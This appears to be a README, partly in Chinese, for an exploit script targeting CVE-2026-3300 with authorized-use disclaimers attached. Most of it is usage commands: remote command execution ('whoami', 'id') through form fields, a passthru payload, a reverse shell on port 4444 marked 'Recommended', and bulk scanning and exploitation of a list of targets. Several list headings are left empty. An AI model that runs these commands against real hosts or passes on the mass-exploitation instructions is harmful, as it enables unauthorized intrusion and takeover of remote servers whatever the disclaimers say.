仅在安全且授权的环境中使用此项目,例如:
示例设置:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
示例用法:
# Normal command execution
python cve-2026-3300.py http://localhost --mode poc -c "whoami"
# Try different payload types
python cve-2026-3300.py http://localhost --mode poc -p passthru -c "id"
# Reverse Shell (Recommended)
python cve-2026-3300.py http://localhost --mode reverse --listen 4444
# Scan all targets
python cve-2026-3300.py --file targets.txt --mode scan
# Exploit all targets
python cve-2026-3300.py --file targets.txt --mode exploit -c "whoami"
# Reverse shell (single target)
python cve-2026-3300.py --file targets.txt --mode reverse -l 4444
# Test with common field names
python cve-2026-3300.py http://target.com --mode exploit --field text_1 -c "whoami"
python cve-2026-3300.py http://target.com --mode exploit --field email -c "id"
# Reverse shell
python cve-2026-3300.py http://target.com --mode reverse --field text_field -l 4444
一个在受控环境中学习、测试和研究网络安全概念的仓库。
此仓库仅用于教育和授权的安全研究。
它旨在帮助用户了解:
仅在您拥有权限的环境中使用此仓库,例如:
严禁未经授权或非法使用。
作者和贡献者不对由本项目引起的任何损害、滥用、法律问题或损失负责。
使用此仓库即表示您同意:
本项目旨在用于:
请遵循负责任的披露实践并遵守所有适用法律。
如需负责任披露或合作,请通过GitHub联系仓库维护者。